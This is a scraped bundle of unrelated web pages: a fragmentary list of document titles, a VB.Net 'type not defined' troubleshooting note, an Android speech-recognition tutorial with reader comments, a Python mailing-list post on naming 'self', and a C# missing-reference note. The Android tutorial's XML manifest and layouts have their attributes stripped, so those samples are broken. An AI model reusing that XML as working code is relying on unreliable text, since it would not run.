APPINTERNALS STEELCENTRAL APPINTERNALS BIG DATA-DRIVEN APPLICATION PERFORMANCE MANAGEMENT BUSINESS CHALLENGE See application performance through your users eyes Modern applications often span dozens of virtual Interoperating with.net Beyond Web Services Interoperating with.net Beyond Web Services Jeroen Frijters Sumatra Software b.v. [email protected] Overview Full Disclosure Why Not Web Services? The Alternatives Demonstrations White paper. IBM WebSphere Application Server architecture White paper IBM WebSphere Application Server architecture WebSphere Application Server architecture This IBM WebSphere Application Server white paper was written by: Jeff Reser, WebSphere Product Manager What is SharePoint? Collaboration Tool The following is an excerpt from the forth coming SharePoint Shepherd s Guide for End Users 2010. For more information visit What is SharePoint? An old skit from Saturday WEB APPLICATION DEVELOPMENT. UNIT I J2EE Platform 9 UNIT I J2EE Platform 9 Introduction - Enterprise Architecture Styles - J2EE Architecture - Containers - J2EE Technologies - Developing J2EE Applications - Naming and directory services - Using JNDI - JNDI Credits: Some of the slides are based on material adapted from 1 The Web, revisited WEB 2.0 [email protected] Credits: Some of the slides are based on material adapted from 2 The old web: 1994 HTML pages (hyperlinks) Avaya Aura Orchestration Designer Avaya Aura Orchestration Designer Avaya Aura Orchestration Designer is a unified service creation environment for faster, lower cost design and deployment of voice and multimedia applications and agent Streaming Real-Time Data into Xcelsius Apps Streaming Real-Time Data into Xcelsius Apps Using the Xcelsius Connector for Adobe LiveCycle Data Services Todd Ruhl Adobe Solutions Architect AGENDA 1. Adobe/Business Objects partnership update 2. Overview Lab: Application Lifecycle Management (ALM) Across Heterogeneous Platforms (Java/.NET) Lab: Application Lifecycle Management (ALM) Across Heterogeneous Platforms (Java/.NET) Published: March 2010 Abstract This Lab showcases how software developers using different languages and tools can CATALOG OF CLASSES IT and Technical Courses CATALOG OF CLASSES IT and Technical Courses Table of Contents CATALOG OF CLASSES... 1 Microsoft... 1 10135BC... 1 Configuring, Managing and Troubleshooting Microsoft Exchange Server 2010 Service Pack 2... Software Architecture Engagement Summary Presented to: George Smith, Chief, Hydrology Laboratory (HL) Jon Roe, Chief, Hydrologic Software Engineering Branch (HSEB) Edwin Welles, Hydrologist, Hydrologic Software Engineering Branch (HSEB) Introduction Making Data Available on the Web Making Data Available on the Web By Simba Technologies Inc. SimbaEngine ODBC SDK Introduction Many companies use web-based services to automate business processes like sales, track items like packages, Creating XML Report Web Services 5 Creating XML Report Web Services In the previous chapters, we had a look at how to integrate reports into Windows and Web-based applications, but now we need to learn how to leverage those skills and SOA REFERENCE ARCHITECTURE: WEB TIER SOA REFERENCE ARCHITECTURE: WEB TIER SOA Blueprint A structured blog by Yogish Pai Web Application Tier The primary requirement for this tier is that all the business systems and solutions be accessible After completing this course, students will have a fundamental understanding of how to: Table of Contents Introduction Audience At Course Completion Prerequisites Microsoft Certified Professional Exams Student Materials Course Outline Introduction This two-day, instructor-led seminar provides WEB SERVICES. Revised 9/29/2015 WEB SERVICES Revised 9/29/2015 This Page Intentionally Left Blank Table of Contents Web Services using WebLogic... 1 Developing Web Services on WebSphere... 2 Developing RESTful Services in Java v1.1... Japan Communication India Skill Development Center Japan Communication India Skill Development Center Java Application System Developer Course Detail Track 2a Java Application Software Developer: Phase1 SQL Overview 70 Introduction Database, DB Server Base One's Rich Client Architecture Base One's Rich Client Architecture Base One provides a unique approach for developing Internet-enabled applications, combining both efficiency and ease of programming through its "Rich Client" architecture. Japan Communication India Skill Development Center Japan Communication India Skill Development Center Java Application System Developer Course Detail Track 2b Java Application Software Developer: Phase1 SQL Overview 70 Introduction Database, DB Server MODULE 7: TECHNOLOGY OVERVIEW. Module Overview. Objectives MODULE 7: TECHNOLOGY OVERVIEW Module Overview The Microsoft Dynamics NAV 2013 architecture is made up of three core components also known as a three-tier architecture - and offers many programming features Process Automation from Scratch December 3, 2013 Tom Bellinson Process Automation from Scratch Over the course of 2013 I have written about a number of canned off the shelf (COTS) products that can be used to automate processes with
http://docplayer.net/303183-Q-so-be-honest-i-promise-i-won-t-tell-anybody-which-one-do-you-like-best-java-or-net.html
CC-MAIN-2016-50
en
refinedweb
Cry about... .Net / VB.Net Troubleshooting Type '<component-name>' is not defined Symptom: When compiling a VB.Net application the compiler generates the following error: Type 'CCCC' is not defined.' If you are using C# then the error is slightly different: The type or namespace name 'CCCC' could not be found (are you missing a using directive or an assembly reference?) in both cases ' CCCC' is the name of a component. The definition of the component exists in the project and in the code behind the component is being created dynamically such as: Dim aControl As MyComponent = LoadControl("MyComponent.ascx") or simply referenced such as: Private _mine As New List(Of MyComponent) either of these giving rise to the error: Type 'MyComponent' is not defined.' To further complicate things whilst this error may be observed when building the project in some cases the project can be built without error with the error only manifesting itself when the project is published. If you get this error when it is not related to a component defined in your project then see my notes for "Type <type-name> is not defined (or which namespace do I need for type X?)". Whilst these notes are primarily aimed at VB.Net they are also applicable to C#. Cause: The compiler cannot find the component of type ' CCCC'. (Why it might sometimes be able to find the component when building but not when publishing is a mystery to me!) Remedy: - If the component is being dynamically created in the code behind for a form or for another component then add an explicit reference to the control in the form's (or control's) definition. Do this by adding a " <% Register ..." directive at the top of the page, for example: <%@ Register src="MyComponent.ascx" tagname="MyComponent" tagprefix="uc11" %> This example is correct assuming the component is called " MyComponent" and the source code for it is in the file " MyComponent.ascx" An even easier way of doing this is to drop the component onto the form (or component) and then delete the instance off the form. This will leave behind the necessary register directive. These notes are believed to be correct for VB.Net for Visual Studio 2008 and Visual Studio 2010 and may apply to other versions as well. About the author: Brian Cryer is a dedicated software developer and webmaster. For his day job he develops websites and desktop applications as well as providing IT services. He moonlights as a technical author and consultant.
http://www.cryer.co.uk/brian/mswinswdev/ms_vbnet_component_name_not_defined.htm
CC-MAIN-2016-50
en
refinedweb
I’ve been searching for a simple tutorial on using voice recognition in Android but haven’t had much luck. The Google official documentation provide an example of the activity, but don’t speculate anything more than that, so you’re kind of on your own a little. Luckily I’ve gone through some of that pain, and should make this easy for you, post up a comment below if you think I can improve this. I’d suggest that you create a blank project for this, get the basics, then think about merging VR into your existing applications. I’d also suggest that you copy the code below exactly as it appears, once you have that working you can begin to tweak it. With your blank project setup, you should have an AndroidManifest file like the following <?xml version="1.0" encoding="utf-8"?> <manifest xmlns: <application android: <activity android: <intent-filter> <action android: <category android: </intent-filter> </activity> </application> </manifest> And have the following in res/layout/voice_recog.xml : <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns: <TextView android: <Button android: <ListView android: </LinearLayout> And finally, this in your res/layout/main.xml : <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns: <TextView android: </LinearLayout> So thats your layout and configuration sorted. It will provide us with a button to start the voice recognition, and a list to present any words which the voice recognition service thought it heard. Lets now step through the actual activity and see how this works. You should copy this into your activity : package com.jameselsey; import android.app.Activity; import android.os.Bundle; import android.content.Intent; import android.content.pm.PackageManager; import android.content.pm.ResolveInfo; import android.speech.RecognizerIntent; import android.view.View; import android.widget.ArrayAdapter; import android.widget.Button; import android.widget.ListView; import java.util.ArrayList; import java.util.List; /** * A very simple application to handle Voice Recognition intents * and display the results */ public class VoiceRecognitionDemo extends Activity { private static final int REQUEST_CODE = 1234; private ListView wordsList; /** * Called with the activity is first created. */ @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.voice_recog); Button speakButton = (Button) findViewById(R.id.speakButton); wordsList = (ListView) findViewById(R.id.list); // Disable button if no recognition service is present PackageManager pm = getPackageManager(); List<ResolveInfo> activities = pm.queryIntentActivities( new Intent(RecognizerIntent.ACTION_RECOGNIZE_SPEECH), 0); if (activities.size() == 0) { speakButton.setEnabled(false); speakButton.setText("Recognizer not present"); } } /** * Handle the action of the button being clicked */ public void speakButtonClicked(View v) { startVoiceRecognitionActivity(); } /** * Fire an intent to start the voice recognition activity. */ private void startVoiceRecognitionActivity() { Intent intent = new Intent(RecognizerIntent.ACTION_RECOGNIZE_SPEECH); intent.putExtra(RecognizerIntent.EXTRA_LANGUAGE_MODEL, RecognizerIntent.LANGUAGE_MODEL_FREE_FORM); intent.putExtra(RecognizerIntent.EXTRA_PROMPT, "Voice recognition Demo..."); startActivityForResult(intent, REQUEST_CODE); } /** * Handle the results from the voice recognition activity. */ @Override protected void onActivityResult(int requestCode, int resultCode, Intent data) { if (requestCode == REQUEST_CODE && resultCode == RESULT_OK) { // Populate the wordsList with the String values the recognition engine thought it heard ArrayList<String> matches = data.getStringArrayListExtra( RecognizerIntent.EXTRA_RESULTS); wordsList.setAdapter(new ArrayAdapter<String>(this, android.R.layout.simple_list_item_1, matches)); } super.onActivityResult(requestCode, resultCode, data); } } Breakdown of what the activity does : Declares a request code, this is basically a checksum that we use to confirm the response when we call out to the voice recognition engine, this value could be anything you want. We also declare a ListView which will hold any words the recognition engine thought it heard. The onCreate method does the usual initialisation when the activity is first created. This method also queries the packageManager to check if there are any packages installed that can handle intents for ACTION_RECOGNIZE_SPEECH. The reason we do this is to check we have a package installed that can do the translation, and if not we will disable the button. The speakButtonClicked is bound to the button, so this method is invoked when the button is clicked. I wrote another tutorial on button binding so have a look at that if you don’t understand this method. The startVoiceRecognitionActivity invokes an activity that can handle the voice recognition, setting the language mode to free form (as opposed to web form) The onActivityResult is the callback from the above invocation, it first checks to see that the request code matches the one that was passed in, and ensures that the result is OK and not an error. Next, the results are pulled out of the intent and set into the ListView to be displayed on the screen. Notes on debugging : You won’t have a great deal of luck running this on the emulator, there may be ways of using a PC microphone to direct audio input into the emulator, but that doesn’t sound like a trivial task. Your best bet is to generate the APK and transfer it over to your device (I’m running an Orange San Francisco / ZTE Blade). If you experience any crashing errors (I did), then connect your device via USB, enable debugging, and then run the following command from a console window <android-home>/platform-tools/adb -d logcat What this does, is invoke the android device bridge, the -d switch specifies to run this against the physical device, and the logcat tells the ADB to print out any device logging to the console. This means anything you do on the device will be logged into your console window, it helped me find a few null pointer issues. That’s pretty much it, its quite a simple activity. Have a play with it and if you have any comments please let me know. You may have mixed results with what the recognition thinks you have said, I’ve had some odd surprises, let me know! Happy coding! 98 thoughts on “Android; How to implement voice recognition, a nice easy tutorial…” Hi James! This is a brilliant tutorial, at least now I understand the code for speech recognition with android. However it shows “recognizer not present” when I run it. What can be the problem? I have a C#speech recognition’s application that work properly on the same machine. Is there a setting that I should make in order to enable the recognizer for android? Thank you Patrick Hi Patrick, glad I’ve helped. When you say you have C# speech recognition, what do you mean by that? Something installed on your local PC? Are you running this on the emulator or on a device? thanks Thanks for the quick response. I meant that I am able to use the Windows 7 Speech recogniser via a C# application. I was hoping that it will be the case with an android application using the emulator. But I just read that the SDK does not include the speech recognition and that it should work on a device, I don’t have a device yet. It there any thing that I can do to attach the speech recogniser to my SDK so that I can use it with my emulator? Thanks Hi James, Thanks for the very good tutorial. I don’t know if its possible to do without getting into unpublished methods within the RecognizerIntent, but I’m trying to run the VR in a service that is interval controlled, and most important DOES NOT SHOW A PROMPT. Do you have any suggestions or can you steer me to a resource that might help? Thanks Hi Dave, Thank you for the kind words, glad I’ve helped. So you want to start off VR from a service that is interval controlled, can I assume that by interval controlled you mean once every X number of seconds for example? Any reason why you specifically need a service for this and why you can’t stick with a basic activity? In regards to not showing a prompt, I’m not sure we have much control over that since its part of the droid SDK, but there may be a way of masking that out, I’ll do some digging. Cheers I guess I can use an Audio Sensor (do you know of a good tutorial, I got errors on Frank Ableson’s tutorial, still can’t get it to work) If there is no way to override the RecognizerIntent class I will have to write my own using the MediaRecorder, ugh. I Need to run as a persistent service for his app, it never completely stops and yes, I will be controlling the interval the VR runs, and stops. Interesting, well heres what I think.. Create a service to do the VR, then have your activity start/stop this based on a time interval. Inside the service you will need to fire off intents to the VR action. I’m not sure how you’ll keep the VR open for extended periods of time (since if it doesn’t hear anything after x number of seconds it will fail). To cover the default prompt you may have to show a view on top of it to mask it out (i.e., show a splash screen over it). I’d have to dabble in a bit more code to give any better advice :) Hey, I tried the code on a recent samsung powered with android but it says the same “recognizer not present”. How did you manage to get it working? Is there specific settings? Hi Patrick, this means that your handset doesn’t have an voice recognition engines. You can go onto the market place and download google Voice if you don’t already have it. My app makes use of VR engines, but it doesn’t provide one itself Hope this helps Hi James. When I try to run the app on the emulator but it says recognizer not present Hi Simphiwe, This means that you don’t have any voice recognition engines on your handset, go onto the marketplace and download Google Voice. My app makes use of VR engines, but it doesn’t provide one itself. Hope this helps hai, thank you for your tutorial. i am trying to run this code using my own database. i prepared my language and acoustic models for the arabic language but I do not know how to connect my database with this code. my application is samall it includes only 10 words(i say the number in arabic and it writes it down). the source i am using for the training is a jar file and it saves my results in zip files. Hi Amal, Interesting app you have there! What behaviour are you experiencing? I think you might have problems using Arabic, this is what the Google website says : So I think that possibly Arabic is not support yet. hi amal, I am trying to do the same thing…so did you successeded? I need help thanks Thanks for the tutorial. The tutorial on the android dev website din’t help much. Thanks Your tutorial was wonderful and worked like a charm, I have a question about VR. Is it possible to input 1 sound and receive another? For example : I input the phrase “I want to go to sleep” and the VR exports the phrase “then go lay down” or “it’s not your bedtime yet”. So i want to input one value/word and have the VR export another desired value. Is that possible? and if so can you point me in the right direction? You can absolutely do that! However there will be some difficulties along the way. How should the app know how to respond? Will you have a database of phrases, whereby if one is detected, it will know the mapping to the response? Or are you planning some form of Artificial Intelligence to do this? Also, the VR can be a little sketchy depending on accents and so forth, I tend to mumble a little bit and it often has trouble detecting what I’m saying. Interesting idea you have though, I’d like to hear how it goes :) Thanks for the speedy response! To answer your questions “How should the app know how to respond? Will you have a database of phrases, whereby if one is detected, it will know the mapping to the response? Or are you planning some form of Artificial Intelligence to do this?” … I don’t know yet. I was thinking of adding a database of catch words, whereas if input is “A” export is “Z”, but I don’t know how to set the Method to do that yet. I mean if i could just learn how to set the first method, i could figure the rest out. Or if i the format for manipulating the database was present, i would at least have a starting point. Any help? Thanks in advance. Sounds a bit fiddly, you could store phrases in a database, then when one is spoken you can obtain all the words and see how many of those match the set phrases you have, for example if 8 out of the 10 words match, you’d be pretty confident. Thats just one way of doing it. The technical side should be fairly easy, just reading/writing to a SQLite instance, the tricky part is working out the business logic of how you want it to work. Personally (without knowing any more about what your app does) I would store set phrases such as “Hello my name is ?” and then when it hears “Hello, my name is James”, it would recognise the words “Hello”, “my”, “name”, “is”, “James” and map them to a set response. The name James would be detected as a variable and used in the response “Nice to meet you James”. Good luck! So does that mean that I have to “build the database”, “modify a built in database” or direct the app to “a database”? Yeah, create yourself a database, a table, and populate it with some dummy data. Please checkout the SQLite tutorial I did, it covers pretty much all of the aforementioned. You can use an online database, or a local SQLite db, or even sync the two, its up to you and depends if you need offline modes. Hi James . In my case i have just copied the existing VoiceRecognitionDemo code you have given here and i am running the code through device but after clicking on button i am getting connect error .. just to mention Google voice search is installed on phone and running perfectly Please help Connect error? Sounds like you don’t have internet connection, which you would need for the VR to work. Couple of things, check your internet connectivity, make sure manifest has internet permissions. If that still doesn’t work, put your logs into pastebin.com and give me a link! :) yeah yes it worked that time only..i refered some blog where it was mentioned that we need to have nternet for google voice search as it has to connect google data server.. anyways thanks for quick reply That is true, everytime you speak into the app, it collects that audio data and sends it off to Google for them to do their “crunching” and then replies with the text, so you must have internet connectivity. Happy coding :) Hi James, I was just wondering how long does it take to recognize a word if it has to go to google servers 1st. how many bytes get send and received per word? Is there any way you can use this class without internet access? Hi Bennie, It depends really, it depends on how many words you are processing, for example if you are quoting 2 pages from a book it will take a bit longer! Also depends on your internet connection, if you have really slow connection the data transfer will obviously take longer. No idea about how many bytes, haven’t been concerned with that low level stuff. If you want to use the Google VR engine then you’ll need internet access, I don’t believe there is a way around that. However there may be other 3rd party VR engines that work in offline mode, I’m not too sure. Hope this helps Hey James, Thanks for the great tutorial! Unfortunately I get a “recognizer not present” message on my phone. (Also ZTE Blade) This is probably due to the fact that for some reason Google Voice is not supported in my country for some reason. (Israel) I wonder if I can somehow get another speech recognizer to work, maybe you know about another application? I’m a total Android noob btw. Thanks! hi James ,i am from India , thats why i’m unable to use Google voice &therefore i’m getting error”recognizer not present” Please suggest me some better option hi james,i am from india,am doing my academic project in one of MNC company.I want to impliment biometric application in android mobile phones.Through voice recognition my mobile should be unlocked, it shld be unlocked for my own voice.so can u suggest code releted to my project. hi james, Is it possible ot make this app work offline?? without google voice ? (with my own database) thanks Thank you very much for your effort. Could you please provide your Facebook account so that we can communicate with you? Best Regards, Mahmoud How i can run speech recognizer… though USB…. Give detail for me please….!!!!! Another real useful tut from u :) y james replay for my quari? y james no reply for my quari?? Hey! I would like to know if there is a way of not using the speech server (Voice search). The Voice dialler apparently use an engine which is on the phone. I have seen a couple of app that do too. Thanx Hello, brilliant tutorial! I get one error though :( “Can’t dispatch DDM chunk 52454151: no handler defined” I have tried everything to fix this! Any chance you can send me the .apk of yours so I can see what is different? Thank you in advance! Interesting, which version of the android SDK are you working to? Hi James,brilliant tutorial. I’m new to speech recognition and Android, and would like to know how is a database for a speech app created ( i.e. if you are creating your own db, say of 10 words only) and how is it connected to the app? hi James . it is possible to do that what you think in your mind it should want to be happen in the mobile? Hi James, brilliant tutorial indeed. I am new to Android and speech recognition and would like to know how is a database of a speech recognition app (i.e. an app working without google search or offline) built and how are the two(app & db) connected. do have any idea? please help Hi Chepe, I’m not too sure since it is not something I’ve investigate too much (offline TTS that is) however there is more than likely APIs out there which you can include in your app. App/DB interconnectivity will probably be via SQLite if local, or some kind of web service call if you have a centralised base on the web. Hope this helps :) Hi James, i’m trying to implement text to speech in our language. Can you give me the right method to produce the voice/sounds from database?? thanks in advance Hi, Which language are you wanting to use, Philipino? Chinese? Spanish? Thanks philipino… i’m from Philippine not UK.. Philipino…We want to know what are the processes in putting natural voices in android so that we can make text-to-speech in philipino.. we are trying to use Syllabification Algorithm..thanks.. Philipino. we are using syllable algorithm..and we have also problems in browsing and receiving text messages..i hope you will help us..thanks Hi James, Great tutorial :). Can I use this engine to recognize sounds of an object rather then words (for example hearing a car or hearing a keyboard pressed)? I want to identify the objects by the sound Or I have to develop my own engine that do so? Great Tutorial! I Was wondering if i could have the user say something and it would search a site in the provided webview of my app. Hi James , Nice Tutorial … Wondering if you can upload somewhere the the “apk” so that i can test it on my device before playing with the codes … Thanks , will be of great help if u can do so asap Jacobs hi ,we not have google voice service in our country . So there is another way to speech recognition on emulator? thank you .nice tutorial ..chennai ..india pls update with new android tech tutorials as well like phone gap why is it that if i say good morning even then it shows me a list good morning strings added with boarding govin body boring..so on listed.. is there a wayh to filter out and list out the exact words spoken out.. pleas reply for the same..thank u.. Hi james, thax for your tutorial ,its very useful for beginnig speech recognition.I ask you this:when I debug it activities (list parameter) size null ,so run if clause directly.This is a simple mistake about hardware or something ,I think.What about you? Thanks for this tutorial. But how to implement “RecognizerIntent.EXTRA_WEB_SEARCH_ONLY” in the onActivityResult method? Thanks in advance!!! hi james.. how can i add speech recognizer in my emulator ?????? i have no android phone……through emulator i am trying to download voice recognizer bt failed … i also used update sdk 3.2 bt failed ………plz help me……….i need a detail help. Hi Auvy, I’m not quite sure, as you would need some way of sending voice input into the emulator. There must be a way via the ADB, but I’m not entirely sure, you’ll have to Google for it. If all else fails, try asking on StackOverflow.com, its a great site for quick and detailed answers. Good luck! Hi James, Thanks for the tutorial. I have it almost working. First it wasn’t working at all, because I had no speech recognizer. So I installed voice search and now the button is visible. When I click on the button it starts. But then once I say anything the program crashes. I get the following error: “The application Voice Search (process com.google.android.voicesearch) has stopped unexpectedly. Please try again. – Force close. Any ideas as to what I should do? Kind Regards Aubrey. Ahh, Fixed it! This will answer the question for allot of people here who want to know how to get a “voice search” speech recognizer other than google voice. Just go to Android market and download an app called “Jeannie”. When you start the app it will say you need to download a speech recognizer. It gives you an option to install voice search for android 1.5 or android 2.1. Then your app works perfectly! Thanks again James. Aubrey. This tutorial has been helpful, thank you very much! Hello, I am get the recorded audio. Is there any one could help me for to change the recorded voice in to mechanical voice ,i.e robot, cat. Thanks in advance Mukund Hi, I setup the code in Eclipse with Android 2.2 SDK. But I get error in Activity file: R cannot be resolved to a variable.. sorry im a noob.. Thank you in advance. FlinxSYS You can regenerate the R.java file if you right click the project in eclipse, does that help? hi james thanks for the tutorial…I am doing a project on voice recognition i am new to android.My project is as follows as we say send msg to [recipient][message] it should send to the particular person i have mentioned in the same way to call, to listen to music, to view map,and to show directions through map can u please help me out while coding Hi Vijay, Interesting project you have going there, is it for university or just for fun? I’m not quite sure what you are trying to do, but it sounds as if you want to speak something and have it sent to someone. I’d suggest you have a read about voice recognition on android and cook up a few quick little apps to play around. If you get stuck with anything specific please let me know! just give me the overview of the project how to start hmmmm thank u so much james for ur quick response…i am just getting trained in android in a small institute…and just want to do my first project…i will send u the abstract of the project so that u can better understand….. Abstract for voice applications: Send text messages Say “send text to [recipient] [message]*” e.g. “send text to Vijay “I am busy call u around 9″ Listen to music Say “listen to [artist/song/album]” e.g. “listen to the kolaveri” Call contacts Say “call [contact name] [phone type]*” e.g. “call Vijay home” Send email Say “send email to [recipient] [subject]* [body]*” e.g. “send email to Vijay How’s life in India treating you? The weather’s beautiful here!” View a map Say “map of [address/city]” e.g. “map of New Delhi” Go to websites Say “go to [website] e.g. “go to Wikipedia” Write a note(Remainder) Say “note to self [message]” e.g. “note to self grocery list banana milk eggs pizza” Search Google Say “[your query]” e.g. “pictures of the golden gate bridge at sunset” OK so your app needs to sit there listening, then when it hears one of a preset list of commands, determine which one it is, then action it accordingly, conceptually quite easy. Best thing I can suggest, is to break this down and experiment with some code. Create a basic app that will listen for commands, then repeat them back to you. Next, create an app that will action the commands when you click a button. Finally, scrap both of them and start fresh, using the knowledge you have, and tie them both up together. Voice recognition is quite nice, but it can sometimes struggle with regional accents, so bear that in mind when developing, speak like an American :) HMMMMM THANK U JAMES WILL TRY IT Thanks for your help earlier. If I have recognizer close and open again for next command, why do i get 1st results, and not 2nd? Do I have to close recognizer to send 2nd results to be stored in results? or? Thank you in advance. FlinxSYS HI james how to read the contact names through voice i am unable to do that in my project its not taking a noun Hi James, I found your interesting tutorial when searching VR Android. I’m working on a project to bring VR to our learning platform. You know many young children are shy or can’t speak correctly even when they are 3 or 4? The idea is to design a game that can recognize the input from a child player. For example the child can say “bring me an apple”, and game character will do accordingly. Do you think it’s realistic to use the current Android open source? Do you provide programming service? Thanks Dan Sure, anything is possible if you invest enough effort. Really depends how clear the child speaks, if they mumble a little bit I’d imagine the VR engine may struggle to detect what they’re saying hello, i want to make a project speech recognition on andriod.. please sugess me from where i have to start…. and what type of software i need… Hi James. Thanks for this. I understand the difference between ACTION_WEB_SEARCH and ACTION_RECOGNIZE_SPEECH as explained in Android dev docs and your example here.. But I am wondering if you or anyone else has practical experience with getting qualitative differences in results using these 2 different language models. I’d like to use the voice recognition in a tutorial that uses voice to select from a finite set of button labels. stacked with this. I have combed the various forums over the net but can’t find the answer. I am using android 4.0.3. Also, will this googlevoice run in an emulator? thanks… stucked with this. I have already combed various forums over the net but can’t find the answer. I am using android 4.0.3. Also, will this googlevoice run in an emulator? thanks… Thank You for this brilliant tutorial. I have been coding for android for about 3 months and this tutorial can just help me to create a voice assistant to understand user commands!! Hi James, nice posting and will definitely try the tutorial u suggesting, btw can this tutorial be running in android 2.2 environment? Hi James, how can I contact you regarding an android application development? Hi James, Great tutorial. Simple to follow and great to get started with. I followed and it works fine but I’m working on an android project that requires to convert a mp3 record to text. Any idea how can I do this? Thanks June There is a message I have seen that always “voice recognizer not present” why ? what is the solution? That is because you have no VR present, download google voice from the market Hi Dude, I am trying to create a service which should always listen for any voice command(if not screen locked), I need your help in that…. Pls reply me as soon as possible…! A service class would probably handle that well, perhaps coupled with a widget would be nice :) hello, i just wanted to get the only word which i spoke , how to get that you app gives the list of all possible words reply ASAP THANK YOU hello,James. I’m magicFox. Have you know that Google service Voice recognition SDK or the jar file? I want to use the plug in the the application.If you have some idear,can you give me a email?mine:[email protected]:[email protected] Thank you very much! Hey! James, do you have any idea how can i make recognition forever in loop (without button clicking). Thank you! Sorry for bad english ( Hey james i currently working on a app that should detect a Beep and trigger an event in the database . Can you help me the code and sample code . I m thinking of using it as a service which will run in background and keeps waiting for the beep to occur and it will store the current time in the database . Can you please help out with this .I am new to android . My email-id [email protected] . Thank you hi james, no doubt it is a great tutorial.. but i like to know can we will do voice recognition without internet…. i will be very thankful to youy if you will provide me the code…for it…plz revert me… Hi James, I have a question. Do you know of a way to make the speech recognition listen for an extended period of time? Thanks It seems to be working but I got no results in the ListView. So I tried Google Search and it works fine. Please let me know what could be the problem. thanks for your tutorial!! im trying to build voice based media player for visually impaired people, could you please help by integrating the voice code with media player. hey james… thanks alot for a great tutorial… But I am trying to do some thing different by the help of this tutorial…… I am doing voice recognition but without internet or you say offline. please help me in doing this. As i have done wioth this code it takes help of google api. So please help me in this that I will search or call my words but without the help of google api…. if possible plz help me in doing this
http://www.jameselsey.co.uk/blogs/techblog/android-how-to-implement-voice-recognition-a-nice-easy-tutorial/
CC-MAIN-2016-50
en
refinedweb
Although we all agree to use 'self' as the "me object" proxy, it's not a keyword, and we could use a different stand in, e.g.: class Human (object): def __init__(me, name): me.name = name def __repr__(me): return 'Hi, my name is %s' % me.name >>> import subgenius >>> aguy = Human('Bob') >>> aguy 'Hi, my name is Bob' It occurs to me that I could test "me" in place of "self" as it's shorter, and as it might encourage a first person identification which I think needs to happen when tackling OO. We explored earlier on this list the difference between CivBuilder 3rd person games, like SimCity and Civilization IV (many others), and 1st person shooters e.g. Quake and Doom. Of course many games give both 1st and 3rd, though we should distinguish between two kinds of 3rd: 3rd as in "I am that character (avatar, action figure or whatever, as in 'Alice')" vs. "I have some god's eye view" (incorporeal flyer, as in Google Earth and most of those WarCrafty type games, also Sims). Likewise, I think when coming to think formally in terms of objects (vs. informally, which begins with the emergence of language), it helps to personally project a "self" into various household objects, houses themselves. Like in the movie 'Cars' we need to *become* a thing, then ask (in the first person): what are my behaviors/methods, what are my attributes/properties? It's a game of "who am I" (or "who I am") and is already a natural feature of childhood play (fantasy self projections). I'm thinking the word 'self', at least in English, is too '3rd person' in some ways, and looking down on a lot of objects, each with a 'self', you have only a god's eye view. However, the grammar around 'me' is different -- there's only one of them (one first person), and therefore thinking "me" promotes a kind of first person instrospective attitude. And we *want* that, as an option, when modeling in OO. So I'd be accomplishing two things in this lesson (involving temporarily substituting "me" for "self" in some class definitions): (a) I'd be communicating the subtle teaching that 'self is not a keyword in Python' and (b) helping with the subliminal process of personally identifying with various objects, in order to become a better object-oriented programmer. At the end of the lesson, I'd reinforce the canonical accepted 'self' (i.e. the god's eye view) as the proper one, but hopefully students would have taken to heart the point of this lesson. Note that I'm not proposing this as a "for kids only" type lesson plan experience. I've been brainstorming a lot about what a Computer Science for Liberal Arts Majors might look like (recent link below), and this whole idea of "point of view" is already standard fare in literature courses, as well as film theory. We can bridge to OO through this "pronouns" discussion. Note about 2nd person: many multi-player Internet games, plus single-user games, do have a "we" concept, i.e. you're a part of a team with a shared objective, up against other players, or up against the computer, as the case may be. Related topic: me.__dict__ is a good intro to the idea of a "personal namespace" in addition to basic Python -- a helpful notion in psychology and diplomacy, where world views may start far apart, but grow closer through growing familiarity with the others' operations. It's in the tradition of Leibniz to want to use some "machine language" as a basis for diplomacy (American Transcendentalism has echoes of that, e.g. in Fuller's 'cosmic computer' meme)). Kirby Liberal Arts Compsci (except selling as Maths in this context):
https://mail.python.org/pipermail/edu-sig/2006-July/006750.html
CC-MAIN-2016-50
en
refinedweb
You can use this module with the following in your ~/.xmonad/xmonad.hs: import XMonad.Layout.HintedTile Then edit your layoutHook by adding the HintedTile layout: myLayout = hintedTile Tall ||| hintedTile Wide ||| Full ||| etc.. where hintedTile = HintedTile nmaster delta ratio TopLeft nmaster = 1 ratio = 1/2 delta = 3/100 main = xmonad defaultConfig { layoutHook = myLayout } Because both Xmonad and Xmonad.Layout.HintedTile define Tall, you need to disambiguate Tall. If you are replacing the built-in Tall with HintedTile, change import Xmonad to import Xmonad hiding (Tall). For more detailed instructions on editing the layoutHook see: XMonad.Doc.Extending
http://hackage.haskell.org/package/xmonad-contrib-0.8.1/docs/XMonad-Layout-HintedTile.html
CC-MAIN-2016-50
en
refinedweb
Cry about... .NET / C# Troubleshooting The type or namespace name 'some-name' does not exist in the namespace 'some-namespace' (C#) Symptom: When compiling a C# application the compiler generates the following error: The type or namespace name 'some-name' does not exist in the namespace 'some-namespace' (are you missing an assembly reference?) where ' some-name' is the name of a type or a namespace and ' some-namespace' is the name of a namespace. For example: The type or namespace name 'UI' does not exist in the namespace 'System.Web' (are you missing an assembly reference?) Possible Causes and Remedies: - The most likely cause is a simple spelling mistake. For example: using System.Webb; will generate "The type or namespace name 'Webb' does not exist in the namespace 'System' (are you missing an assembly reference?) but in this case it should be: using System.Web; - Otherwise, like the error says, you are probably missing an assembly reference. Each project (be it an application or a class library) contains references which might be to other class libraries or libraries which are provided as part of the .NET framework. So check the list of references for the project these are shown in the Solution Explorer under "References" in the tree view (or for VB.Net they are shown on the "References" tab of the project properties). If the reference is not listed then add it. For example if I have "using System.Web;" in my code then a reference to System.Web needs to be listed. It will be by default for web projects but will not by default for class libraries. Simply right click the "References" title in Solution Explorer and select "Add reference..." (or for VB.Net click [Add...] when viewing the list of references in the project properties). When adding a reference the "Projects" tab contains (as you would expect) a list of projects in the solution, and the ".NET" tab contains all the projects available from the .NET framework or which have been added to the GAC. Unfortunately the contents of ".NET" tab are not sorted alphabetically, which can make finding the necessary reference difficult. If you still cannot find the reference listed then an alternative approach is to browse for it. The following table lists the location of various namespaces: I expect to add to this table slowly over time. - See also: The type or namespace name '<type-name>' could not be found (C#) These notes are believed to be correct for C# for Visual Studio 2010.
http://www.cryer.co.uk/brian/mswinswdev/ms_csharp_type_or_namespace_does_not_exist_in_the_namespace.htm
CC-MAIN-2016-50
en
refinedweb
